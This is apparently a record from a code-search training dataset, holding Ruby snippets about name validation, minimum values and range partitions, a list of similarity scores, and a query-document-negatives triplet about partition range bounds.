"def add( name, *args, &block )\n\t\tname = name.to_sym\n\t\tconstraint = Constraint.for( name, *args, &block )\n\n\t\t# No-op if there's already a parameter with the same name and constraint\n\t\tif self.constraints.key?( name )\n\t\t\treturn if self.constraints[ name ] == constraint\n\t\t\traise ArgumentError,\n\t\t\t\t\"parameter %p is already defined as %s; perhaps you meant to use #override?\" %\n\t\t\t\t\t[ name.to_s, self.constraints[name] ]\n\t\tend\n\n\t\tself.log.debug \"Adding parameter %p: %p\" % [ name, constraint ]\n\t\tself.constraints[ name ] = constraint\n\n\t\tself.validated = false\n\tend",
"def empty_name_error(type, what)\n validation_error(type, what, 'name is empty')\n end",
"def validate_name(name)\n !name.scan(/\\D/).empty?\n end",
"def supports_external_drop_constraints?() false; end",
"def skip_validations\n true\n end",
"def your_name_is_not_dumb\n if name.include?(\"dumb\")\n errors.add(:name, \"is dumb\")\n end\n end",
"def sv_not_synonym_of_self\n if list_of_invalid_taxon_names.include?(self)\n soft_validations.add(:base, \"Taxon has two conflicting relationships (invalidating and validating). To resolve a conflict, add a status 'Valid' to a valid taxon.\")\n end\n end",
"def check_transaction_name( name )\n # No-op -- apparently absolutely anything is a valid transaction name?\n # This is here for when that inevitably comes back to haunt us.\n end",
"def validate_network_name!(network_name, env)\n if !env[:machine].provider.driver.existing_named_network?(network_name)\n raise Errors::NetworkNameUndefined,\n network_name: network_name\n end\n true\n end",
"def validate_name(name)\n return if name =~ /\\A[a-z0-9]+[-\\/][a-z][a-z0-9_]*\\Z/i\n\n namespace, modname = name.split(/[-\\/]/, 2)\n modname = :namespace_missing if namespace == ''\n\n err = case modname\n when nil, '', :namespace_missing\n \"the field must be a namespaced module name\"\n when /[^a-z0-9_]/i\n \"the module name contains non-alphanumeric (or underscore) characters\"\n when /^[^a-z]/i\n \"the module name must begin with a letter\"\n else\n \"the namespace contains non-alphanumeric characters\"\n end\n\n raise ArgumentError, \"Invalid 'name' field in metadata.json: #{err}\"\n end",
"def supports_external_drop_constraints?() true; end",
"def skip_validation_for(*args)\n args.each { |attr| send(\"skip_#{attr}_validation=\", true) }\n end",
"def should_be_wrong_duplicated_name(wrong_song = @wrong_song)\n validate_column_errors(wrong_song, :name, false, 'activerecord.errors.messages.taken')\n end",
"def validate_name\n if third_party && name.blank?\n errors.add(\n :name,\n :blank,\n )\n end\n end",
"def validate(method_name)\n validations << method_name\n end",
"def validates_duplicity_of(attr_name, scope: nil)\n set_callback :save, :before, Callback.new(attr_name, scope)\n end",
"def cannot_have_conflicts\n \terrors.add(:base, \"Conflicts with another reservation\") if self.has_conflicts?\n end",
"def validate_impossible_changes\n if @slide\n errors.add(:lesson_id, :cant_be_changed) if @slide.lesson_id != self.lesson_id\n errors.add(:kind, :cant_be_changed) if @slide.kind != self.kind\n errors.add(:title, :in_cover_it_cant_be_different_by_lessons_title) if @lesson && self.cover? && @slide.title != self.title && @lesson.title != self.title\n end\n end",
"def validate_relation(klass, name, options = {})\n [name, \"#{name}?\".to_sym, \"#{name}=\".to_sym].each do |n|\n if Mongoid.destructive_fields.include?(n)\n raise Errors::InvalidRelation.new(klass, n)\n end\n end\n end",
"def be_invalid_with(attribute, *values)\n BeInvalidWith.new(attribute, values)\n end",
"def validate_unique_name(name)\n if @@events.reduce(true) {|outcome, event| outcome && (event.name != name)}\n # Event name is unique.\n return name\n else\n handle_validation_fail \"That event name already exists!\"\n return false\n end\n end",
"def check_validity_of_scope\n errors.add(:name, \"is not a valid scope name\") unless Product.respond_to?(self.name.intern)\n apply_on(Product).limit(0) != nil\n rescue Exception => e\n unless Rails.env.production?\n\n puts \"name: #{self.name}\"\n puts \"arguments: #{self.arguments.inspect}\"\n puts e.message\n puts e.backtrace\n end\n errors.add(:arguments, \"are incorrect\")\n end",
"def validate_impossible_changes\n errors.add(:group_id, :cant_be_changed) if @mailing_list_address && @mailing_list_address.group_id != self.group_id\n end",
"def valid_name!\n return unless @name.blank?\n\n @success = false\n @error = 'Error: site name must be present'\n end",
"def validate_name\n if name.match(/\\|/)\n errors.add(:name, \"cannot have a '|' character\")\n end\n end",
"def require_validator(short_name)\n str_name = short_name.to_s\n validators.fetch(str_name) do\n Grape::Validations::Validators.const_get(\"#{str_name.camelize}Validator\")\n end\n rescue NameError\n raise Grape::Exceptions::UnknownValidator.new(short_name)\n end",
"def ensure_name_availability!(name)\n raise 'Name already in use' if kvm_exists?(name)\nend",
"def association_invalide\n @validations.keys.detect do |nom_association|\n !@validations[nom_association].call\n end\n end",
"def test_should_require_name_group\n group = create(:name => nil)\n assert group.errors.invalid?(:name), \":name should be required\"\n assert_invalid group, \"group shouldn't be created\"\n end",
"def unique_name\n return true unless company && name\n scope = company.time_periods.where('LOWER(name) = ?', self.name.downcase)\n scope = scope.where('id <> ?', self.id) if self.id\n\n errors.add(:name, \"with value #{name} has already been taken\") if scope.count > 0\n end",
"def validate\n needs :project unless skip_project_check?\n end",
"def preconditions\n validator.kind == :uniqueness\n end"
] |
[
"0.7206155",
"0.6627902",
"0.65585315",
"0.6364898",
"0.6355886",
"0.6327348",
"0.62545794",
"0.6238708",
"0.61284125",
"0.60058",
"0.60058",
"0.5994172",
"0.5992439",
"0.5991104",
"0.5974525",
"0.59616953",
"0.59547657",
"0.5903176",
"0.58597124",
"0.5849842",
"0.58259225",
"0.58173513",
"0.5791231",
"0.5791231",
"0.5791231",
"0.5787675",
"0.5771683",
"0.5747298",
"0.5715261",
"0.57091385",
"0.56890893",
"0.56813157",
"0.5675356",
"0.5663056",
"0.56399626",
"0.56140214",
"0.5610613",
"0.55731565",
"0.5557491",
"0.5557491",
"0.55436736",
"0.5493901",
"0.54853374",
"0.54709256",
"0.54678464",
"0.54576164",
"0.54547524",
"0.54505485",
"0.54422814",
"0.54422814",
"0.5408871",
"0.5404514",
"0.54030854",
"0.5392216",
"0.53610677",
"0.53496367",
"0.53374",
"0.5336137",
"0.5320154",
"0.5314097",
"0.5311139",
"0.5304028",
"0.52935874",
"0.5291031",
"0.5289493",
"0.52828765",
"0.52758276",
"0.52691513",
"0.52679724",
"0.526597",
"0.52554834",
"0.52517194",
"0.5245579",
"0.5242453",
"0.5238094",
"0.52378416",
"0.52352864",
"0.5214643",
"0.52121836",
"0.5196829",
"0.51962984",
"0.51955736",
"0.51950645",
"0.5192693",
"0.51908875",
"0.5182005",
"0.51746607",
"0.51732516",
"0.5171532",
"0.51711714",
"0.51687896",
"0.5163378",
"0.51627505",
"0.5161497",
"0.5147023",
"0.5134708",
"0.51332146",
"0.5123329",
"0.5116662",
"0.5116402"
] |
0.7885657
|
0
|
The minimum value of the data type used in range partitions, useful as an argument to from.
|
def minvalue
MINVALUE
end
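A hedged usage sketch (the migration helper and keyword names are assumptions shaped after the from/to wording in the docstring): passing minvalue leaves the lower bound of a range partition open, mirroring PostgreSQL's FROM (MINVALUE).

# Hypothetical call producing FROM (MINVALUE) TO (1000) in the DDL:
create_range_partition_of :events,
  name: :events_low,
  from: minvalue, # open-ended lower bound
  to: 1_000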
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def min\r\n @range.min\r\n end",
"def min\n @range.begin\n end",
"def casted_minimum\n minimum.blank? ? nil : (qtype_name == \"decimal\" ? minimum : minimum.to_i)\n end",
"def min\n return super if super.nil?\n (numeric_type == 'Integer') ? super.to_i : super.to_f\n end",
"def min\n to_a.min\n end",
"def get_min()\n end",
"def min\n return @t_min\n end",
"def min() end",
"def min; end",
"def min; end",
"def get_min()\n @data.min\n end",
"def low\n @range_low\n end",
"def get_min()\n @min\n end",
"def range_start; range.first; end",
"def range_low_or_nil\n return nil unless respond_to?(:range) && respond_to?(:range_low)\n range_low unless range == I18n.t('comparables.missing')\n end",
"def get_min\n @min\n end",
"def acceptable_min\n return unless min_max_validator\n\n min_max_validator.options[:in]&.min || type_related_acceptable_min\n end",
"def minimum\n object.minimum.to_f\n end",
"def min\n @min || 0;\n end",
"def min\n end",
"def min\n end",
"def min\n self.class.min\n end",
"def get_min()\n @min \n end",
"def min_tb_rangeF; @min_sf; end",
"def key_for_min_value\n end",
"def min(value)\n opts[:min] = value\n end",
"def min\n only_with('min', 'NilClass', 'Numeric', 'String', 'DateTime')\n items.compact.min\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min_tb_rangeE; @min_se; end",
"def minimum\n return @minimum\n end",
"def minimum_value\n @minimum_value || store.min\n end",
"def t_min\n @temp.min\n end",
"def numeric_from\n @from\n end",
"def odb_min\n \"min(#{to_s})\"\n end",
"def origin\n range.low\n end",
"def find_min()\r\n self.min\r\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def set_min( min )\n if IntegerOption.bounds_ok?( min, @max )\n @min = min\n else\n @min = nil\n raise \"invalid lower bound: #{ min.to_s }\"\n end\n end",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def m_range\r\n end",
"def min(args)\n col = column field: args[:field]\n col.map! {|item| item = item.to_f} \n col.min\n end",
"def minimum=(value)\n @minimum = value\n end",
"def min(field)\n determine(field, :<=)\n end",
"def min( value )\n if value < self\n value\n else\n self\n end\n end",
"def minmax\n [min, unbounded? ? INFINITY : max]\n end",
"def start\n @range.start\n end",
"def schema_range_type(db_type)\n :range\n end",
"def range; end",
"def range; end",
"def range; end",
"def range\n unless value.is_a? Range\n errors.add(:value, :range)\n end\n end",
"def minimum\n Minimum.new(self)\n end",
"def range_value\n string_value\n end",
"def min_element\n self.to_a.min\n end",
"def min\n\t\tm = self.valor[0]\n\t\tfor i in (0...self.valor.size.to_i)\n\t\t\t\tif (self.valor[i]< m)\n\t\t\t\t\tm = self.valor[i]\n\t\t\t\tend\n\t\tend\n\t\treturn m\n\tend",
"def get_min\n @min ||= calculate_min\n end",
"def min_value(value, pdef)\n if(value.to_i >= pdef['MinValue'].to_i)\n true\n else\n \"Value must not be less than #{pdef['MinValue']}\"\n end\n end",
"def min(attr)\n column(attr).min\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def min_point\n # generate the bounding box if not already done\n bounding_box\n # return the min\n @min\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def get_range_start(code_point, block_data)\n start_data = block_data[block_data.keys.min]\n\n if start_data[1] =~ /<.*, First>/\n start_data = start_data.clone\n start_data[0] = code_point\n start_data[1] = start_data[1].sub(', First', '')\n start_data\n end\n end",
"def create_range_data( rng, minrng=0, type=0, direction=2 )\n return Handlers::Range.createRange( rng, minrng, type, direction )\n end",
"def range_from_field(field)\n if class_exists? field.variable\n range = @problem.get_objects_of_class(field.variable)\n else\n range = @problem.objects[field.variable].get_value(field.attribute).to\n end\n range\n end",
"def min_value_quarter_sheet(value)\n only_values = self.class.only_values\n min = only_values.first\n only_values.each do |only_value|\n if only_value <= value\n min = only_value\n else\n break\n end\n end\n {:base_value => base_value,:value_quarter_sheet =>min ,:t => eval(\"v_#{min}_t\"),:tr => eval(\"v_#{min}_tr\")}\n end",
"def validation_min\n validation = validations? && validations.find do |validation|\n validation.kind == :numericality\n end\n\n if validation\n # We can't determine an appropriate value for :greater_than with a float/decimal column\n raise IndeterminableMinimumAttributeError if validation.options[:greater_than] && column? && [:float, :decimal].include?(column.type)\n\n if validation.options[:greater_than_or_equal_to]\n return (validation.options[:greater_than_or_equal_to].call(object)) if validation.options[:greater_than_or_equal_to].kind_of?(Proc)\n return (validation.options[:greater_than_or_equal_to])\n end\n\n if validation.options[:greater_than]\n return (validation.options[:greater_than].call(object) + 1) if validation.options[:greater_than].kind_of?(Proc)\n return (validation.options[:greater_than] + 1)\n end\n end\n end",
"def minimum(arr)\n m = arr.min\n m\n end",
"def find_min\n loc = find_min_locator and loc.value\n end",
"def start\n @min\n end",
"def set_Minimum(value)\n set_input(\"Minimum\", value)\n end",
"def lower_bound_inclusive\n lower_bound\n end",
"def min\n @store.peek[:min] unless empty?\n end",
"def range_to_value\n return nil if range.nil?\n if val = self.ranges[range.to_sym]\n val.value.call\n else\n raise TypeError, \"invalid range #{range}. Please define it.\"\n end\n end",
"def min_range=(range)\n @min_range = [0, range].max\n @max_range = [@min_range, @max_range].max\n end",
"def range(range)\n assert_range range\n schema do |s|\n s.type range.begin.is_a?(Integer) ? 'integer' : 'number'\n s.minimum range.begin\n s.maximum range.end, exclusive: range.exclude_end? unless range.end.nil?\n end\n end",
"def min\n if min_element.kind_of? Array\n min_element.first\n else\n min_element\n end\n end",
"def to_range\n case\n when open?, unknown?\n nil\n else\n Range.new(unknown_start? ? Date.new : @from, max)\n end\n end",
"def rarest\n mode_generic :min\n end",
"def range\n @range ||= set_range\n end",
"def min\n @min ||= time_parts[1]\n end",
"def get_min()\n # smallest = Float::INFINITY\n # @stack.each do |item|\n # if item < smallest\n # smallest = item\n # end\n # end\n # return smallest\n @stack.min\n end",
"def my_min(array)\n\t\n\tarray.min\n\t\nend",
"def smallest_range_i(a, k)\n result = a.max - a.min - 2 * k\n result >= 0 ? result : 0\nend",
"def range_start=( value ); @range_start = value; rationalise_dates(); end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def min_gauge\n data[:min_gauge]\n end",
"def validate_range(value)\n classname = value.class.to_s\n case classname\n when \"Range\" \n then value\n when \"Array\"\n then value\n else\n return (value..value)\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def first\n @range.first\n end",
"def range\n object.range + DEFAULT_MAX_DISTANCE\n end",
"def better_my_min\n min = self.first\n self.each do |el|\n min = el if el < min\n end\n min\n end",
"def min_range (digits)\n\tstarta = [\"1\"]\n\t1.upto(digits-1) do |i|\n\t\tstarta.insert(i,0)\n\tend\n return starta.to_s.to_i\nend",
"def left\n @x_min\n end",
"def from\n @from == -Float::INFINITY ? nil : @from\n end"
] |
[
"0.71220946",
"0.70545757",
"0.6893678",
"0.67407",
"0.6515799",
"0.6494269",
"0.64925396",
"0.6426321",
"0.64184254",
"0.64184254",
"0.6386808",
"0.637547",
"0.635593",
"0.6348471",
"0.6339401",
"0.632692",
"0.6290225",
"0.62870634",
"0.6271629",
"0.6221216",
"0.6221216",
"0.61985236",
"0.61813456",
"0.617979",
"0.6172044",
"0.61431867",
"0.61163294",
"0.6116107",
"0.6116107",
"0.60615396",
"0.5991603",
"0.5985911",
"0.59824145",
"0.59527135",
"0.5936669",
"0.593237",
"0.5903712",
"0.590333",
"0.590333",
"0.590333",
"0.58913904",
"0.588418",
"0.5878332",
"0.5873431",
"0.5836004",
"0.57959384",
"0.5766558",
"0.5762322",
"0.57378846",
"0.5736755",
"0.573156",
"0.573156",
"0.573156",
"0.5730428",
"0.57220393",
"0.57055086",
"0.56934315",
"0.5682015",
"0.567918",
"0.56684995",
"0.56648225",
"0.5660953",
"0.5660953",
"0.5655875",
"0.5620945",
"0.56165385",
"0.56021273",
"0.56011224",
"0.55905133",
"0.55834",
"0.5560406",
"0.5542995",
"0.5534406",
"0.5528613",
"0.55249846",
"0.55219364",
"0.55204046",
"0.5519689",
"0.55026364",
"0.5499218",
"0.5490894",
"0.54833454",
"0.54635",
"0.54627895",
"0.5462095",
"0.54577196",
"0.5455514",
"0.5453215",
"0.54465973",
"0.5434956",
"0.54315954",
"0.54163367",
"0.54163367",
"0.54163367",
"0.5408083",
"0.5403758",
"0.53966504",
"0.53815615",
"0.53711325",
"0.53664356"
] |
0.67341924
|
4
|
The maximum value of the data type used in range partitions, useful as an argument to to.
|
def maxvalue
MAXVALUE
end
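Symmetrically, a hedged sketch using the same hypothetical helper as above: passing maxvalue leaves the upper bound open, mirroring PostgreSQL's TO (MAXVALUE).

# Hypothetical call producing FROM (1000) TO (MAXVALUE) in the DDL:
create_range_partition_of :events,
  name: :events_high,
  from: 1_000,
  to: maxvalue # open-ended upper bound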
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def casted_minimum\n minimum.blank? ? nil : (qtype_name == \"decimal\" ? minimum : minimum.to_i)\n end",
"def min\n return super if super.nil?\n (numeric_type == 'Integer') ? super.to_i : super.to_f\n end",
"def min\r\n @range.min\r\n end",
"def minvalue\n MINVALUE\n end",
"def min\n to_a.min\n end",
"def min\n @range.begin\n end",
"def min\n return @t_min\n end",
"def get_min()\n @data.min\n end",
"def minimum\n object.minimum.to_f\n end",
"def get_min()\n end",
"def min\n self.class.min\n end",
"def get_min()\n @min\n end",
"def get_min\n @min\n end",
"def min() end",
"def min; end",
"def min; end",
"def key_for_min_value\n end",
"def min\n @min || 0;\n end",
"def minimum_value\n @minimum_value || store.min\n end",
"def min\n only_with('min', 'NilClass', 'Numeric', 'String', 'DateTime')\n items.compact.min\n end",
"def acceptable_min\n return unless min_max_validator\n\n min_max_validator.options[:in]&.min || type_related_acceptable_min\n end",
"def get_min()\n @min \n end",
"def t_min\n @temp.min\n end",
"def minimum\n return @minimum\n end",
"def odb_min\n \"min(#{to_s})\"\n end",
"def min\n end",
"def min\n end",
"def range_low_or_nil\n return nil unless respond_to?(:range) && respond_to?(:range_low)\n range_low unless range == I18n.t('comparables.missing')\n end",
"def find_min()\r\n self.min\r\n end",
"def low\n @range_low\n end",
"def min_tb_rangeF; @min_sf; end",
"def min_element\n self.to_a.min\n end",
"def min(value)\n opts[:min] = value\n end",
"def min_tb_rangeE; @min_se; end",
"def min(args)\n col = column field: args[:field]\n col.map! {|item| item = item.to_f} \n col.min\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def min\n empty? ? Float::INFINITY : @list.head.value[1]\n end",
"def minimum\n Minimum.new(self)\n end",
"def min(attr)\n column(attr).min\n end",
"def min\n if min_element.kind_of? Array\n min_element.first\n else\n min_element\n end\n end",
"def min(field)\n determine(field, :<=)\n end",
"def min( value )\n if value < self\n value\n else\n self\n end\n end",
"def validation_min\n validation = validations? && validations.find do |validation|\n validation.kind == :numericality\n end\n\n if validation\n # We can't determine an appropriate value for :greater_than with a float/decimal column\n raise IndeterminableMinimumAttributeError if validation.options[:greater_than] && column? && [:float, :decimal].include?(column.type)\n\n if validation.options[:greater_than_or_equal_to]\n return (validation.options[:greater_than_or_equal_to].call(object)) if validation.options[:greater_than_or_equal_to].kind_of?(Proc)\n return (validation.options[:greater_than_or_equal_to])\n end\n\n if validation.options[:greater_than]\n return (validation.options[:greater_than].call(object) + 1) if validation.options[:greater_than].kind_of?(Proc)\n return (validation.options[:greater_than] + 1)\n end\n end\n end",
"def range_start; range.first; end",
"def minimum=(value)\n @minimum = value\n end",
"def min\n\t\tm = self.valor[0]\n\t\tfor i in (0...self.valor.size.to_i)\n\t\t\t\tif (self.valor[i]< m)\n\t\t\t\t\tm = self.valor[i]\n\t\t\t\tend\n\t\tend\n\t\treturn m\n\tend",
"def min\n @store.peek[:min] unless empty?\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def min\n if @time\n @time.min\n elsif @datetime\n @datetime.min\n else\n to_time.min\n end\n end",
"def schema_range_type(db_type)\n :range\n end",
"def get_min\n @min ||= calculate_min\n end",
"def rarest\n mode_generic :min\n end",
"def min_point\n # generate the bounding box if not already done\n bounding_box\n # return the min\n @min\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def get_min()\n # smallest = Float::INFINITY\n # @stack.each do |item|\n # if item < smallest\n # smallest = item\n # end\n # end\n # return smallest\n @stack.min\n end",
"def least\n nil\n end",
"def numeric_from\n @from\n end",
"def minimum(arr)\n m = arr.min\n m\n end",
"def better_my_min\n min = self.first\n self.each do |el|\n min = el if el < min\n end\n min\n end",
"def min_value(value, pdef)\n if(value.to_i >= pdef['MinValue'].to_i)\n true\n else\n \"Value must not be less than #{pdef['MinValue']}\"\n end\n end",
"def range_value\n string_value\n end",
"def minmax\n [min, unbounded? ? INFINITY : max]\n end",
"def set_min( min )\n if IntegerOption.bounds_ok?( min, @max )\n @min = min\n else\n @min = nil\n raise \"invalid lower bound: #{ min.to_s }\"\n end\n end",
"def smallest\n # self.compact.sort.first\n self.compact.min\n end",
"def peekMin()\n @store[1]\n end",
"def find_min\n loc = find_min_locator and loc.value\n end",
"def min\n @nodes.first\n end",
"def origin\n range.low\n end",
"def find_min_priority\n loc = find_min_locator and [loc.value, loc.priority]\n end",
"def my_min(array)\n\t\n\tarray.min\n\t\nend",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def get_min()\n @array[-1][1]\n end",
"def minimum\n sides.map(&:value).min\n end",
"def min_gauge\n data[:min_gauge]\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def min\n @min ||= time_parts[1]\n end",
"def set_Minimum(value)\n set_input(\"Minimum\", value)\n end",
"def tempo_min\n @tempo_min ||= data[:tempo_min].to_i\n end",
"def range_to_value\n return nil if range.nil?\n if val = self.ranges[range.to_sym]\n val.value.call\n else\n raise TypeError, \"invalid range #{range}. Please define it.\"\n end\n end",
"def find_min_value(array)\n return array.min\nend",
"def min_value_quarter_sheet(value)\n only_values = self.class.only_values\n min = only_values.first\n only_values.each do |only_value|\n if only_value <= value\n min = only_value\n else\n break\n end\n end\n {:base_value => base_value,:value_quarter_sheet =>min ,:t => eval(\"v_#{min}_t\"),:tr => eval(\"v_#{min}_tr\")}\n end",
"def find_min\r\n return nil if !@head\r\n cursor = @head\r\n min = cursor.data\r\n while cursor\r\n if cursor.data < min\r\n min = cursor.data\r\n end\r\n cursor = cursor.next\r\n end\r\n return min\r\n end",
"def min\n @v.compact.min\n rescue\n nil\n end",
"def min_x\n c2f_x(0)\n end",
"def range\n unless value.is_a? Range\n errors.add(:value, :range)\n end\n end",
"def is_min_number?()\n return @ucItemNumber.value == @ucItemNumber.min\n end",
"def left\n @x_min\n end",
"def min_value\n if @head.nil?\n return nil\n else\n if head.left\n min_value = min_search(head.left).data\n else\n min_value = head.data\n end\n end\n return min_value\n end",
"def first\n @range.first\n end",
"def m_range\r\n end",
"def infer_r_value(x)\n case x\n when Range\n x.to_a\n else\n x\n end\n end",
"def min\n @keys[0]\n end",
"def typecast(value)\n if value.kind_of?(Range) then Range.new(typecast(value.first), typecast(value.last))\n elsif value.kind_of?(Array) then value.map{|v| typecast(v)}\n elsif primitive == BigDecimal then super(value).to_f\n elsif primitive == DateTime then Time.parse(super(value).to_s).to_i\n elsif primitive == Date then Time.parse(super(value).to_s).to_i\n elsif primitive == Time then super(value).to_i\n else\n super(value) # Good luck\n end\n end",
"def value_type\n @type.value_type\n end",
"def min()\n return stack.stack.last[:min]\n end",
"def subtype\n self.numeric_type\n end",
"def subtype\n self.numeric_type\n end"
] |
[
"0.7153883",
"0.7048134",
"0.67539436",
"0.6592181",
"0.65727943",
"0.65612084",
"0.6537592",
"0.6452847",
"0.6444002",
"0.63955337",
"0.63713956",
"0.63656867",
"0.6273183",
"0.6239701",
"0.62211186",
"0.62211186",
"0.62070656",
"0.61946446",
"0.6178495",
"0.6156211",
"0.6116574",
"0.6110825",
"0.60353035",
"0.6034875",
"0.6026568",
"0.6020158",
"0.6020158",
"0.60174876",
"0.5945713",
"0.5940888",
"0.59148866",
"0.591221",
"0.5910731",
"0.58039147",
"0.5784461",
"0.57828206",
"0.57828206",
"0.5758865",
"0.57566047",
"0.5735282",
"0.5668474",
"0.56684023",
"0.56583786",
"0.56396866",
"0.562749",
"0.562412",
"0.5611304",
"0.5590029",
"0.5590029",
"0.5590029",
"0.5584117",
"0.558352",
"0.5570801",
"0.55707735",
"0.55623794",
"0.55623794",
"0.5555953",
"0.55124396",
"0.5504035",
"0.55009013",
"0.5478255",
"0.5473461",
"0.5434739",
"0.5433176",
"0.54199123",
"0.5413922",
"0.540758",
"0.5405908",
"0.5403861",
"0.54024255",
"0.54022306",
"0.53924066",
"0.5392367",
"0.53827596",
"0.5363557",
"0.53632456",
"0.53591096",
"0.53591096",
"0.53591096",
"0.53539014",
"0.53446996",
"0.5334617",
"0.5331522",
"0.53303254",
"0.5325022",
"0.5314397",
"0.5305429",
"0.52930474",
"0.52684796",
"0.5264694",
"0.52471477",
"0.5243009",
"0.52273643",
"0.52238935",
"0.52234584",
"0.52165467",
"0.51992345",
"0.5196032",
"0.5183783",
"0.5168788",
"0.5168788"
] |
0.0
|
-1
|
Assumes range partitioning, sets the inclusive minimum value of the range for this partition.
|
def from(*v)
@from = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min(lower_bound, inclusive = nil)\n @min = lower_bound\n @min_inclusive = inclusive\n end",
"def min\n @range.begin\n end",
"def set_min(min)\n\n @min = min \n\n end",
"def set_min( min )\n if IntegerOption.bounds_ok?( min, @max )\n @min = min\n else\n @min = nil\n raise \"invalid lower bound: #{ min.to_s }\"\n end\n end",
"def minimum=(value)\n @minimum = value\n end",
"def min\r\n @range.min\r\n end",
"def set_Minimum(value)\n set_input(\"Minimum\", value)\n end",
"def min(value)\n opts[:min] = value\n end",
"def min_range=(range)\n @min_range = [0, range].max\n @max_range = [@min_range, @max_range].max\n end",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def min() end",
"def set_lower_bound!(partitions)\n @operations_lower_bound = (partitions.op_optimized_size.to_f / @list.size).ceil\n @operations_rounding_adjustment = @operations_lower_bound * @list.size - partitions.op_optimized_size\n @sites_lower_bound = (partitions.total_sites.to_f / @list.size).ceil\n @sites_rounding_adjustment = @sites_lower_bound * @list.size - partitions.total_sites\n end",
"def position_min=(new_position_min)\n Klass.setPositionMin(@handle, @index, new_position_min.to_f)\n new_position_min\n end",
"def low\n @range_low\n end",
"def min( value )\n if value < self\n value\n else\n self\n end\n end",
"def set_min_value(value_array)\n min = value_array[0]\n\n value_array.each do |value|\n min = value if value < min\n end\n min\nend",
"def range_start=( value ); @range_start = value; rationalise_dates(); end",
"def earliest_limit=( value )\n @earliest_limit = to_date( value )\n end",
"def min=(value)\n MSPhysics::Newton::Hinge.set_min(@address, value)\n end",
"def set_MinEntries(value)\n set_input(\"MinEntries\", value)\n end",
"def min\n @min || 0;\n end",
"def range\n @range ||= set_range\n end",
"def set_MinLatitude(value)\n set_input(\"MinLatitude\", value)\n end",
"def set_MinLatitude(value)\n set_input(\"MinLatitude\", value)\n end",
"def range_start; range.first; end",
"def normalize\n store.normalize(minimum: minimum_value, spread: @spread)\n end",
"def from(start_key)\n unless partition_specified?\n raise IllegalQuery,\n \"Can't construct exclusive range on partition key #{range_key_name}\"\n end\n scoped(lower_bound: bound(true, true, start_key))\n end",
"def minvalue\n MINVALUE\n end",
"def min_position=(value)\n MSPhysics::Newton::Corkscrew.set_min_position(@address, value)\n end",
"def minimum_price(price)\n set_limiting_value(:minimum, :price, price)\n end",
"def SetRange(range)\n @range=range\n end",
"def set_min(fields)\n view.update_many(\"$min\" => collect_operations(fields))\n end",
"def min; end",
"def min; end",
"def get_min\n @min ||= calculate_min\n end",
"def range=(range)\n @range = range\n end",
"def replace_min(value, priority=value, subpriority=nil)\n subpriority ||= @totalcount\n @totalcount += 1\n loc = find_min_locator\n loc.update(value, priority, subpriority)\n loc\n end",
"def min\n move(0)\n end",
"def min\n end",
"def min\n end",
"def reset()\n @value = self.min\n end",
"def declare_beg_range\n\t\t@beg_range = @beg_range.to_date \n\t\t@end_range = @end_range.to_date \n\tend",
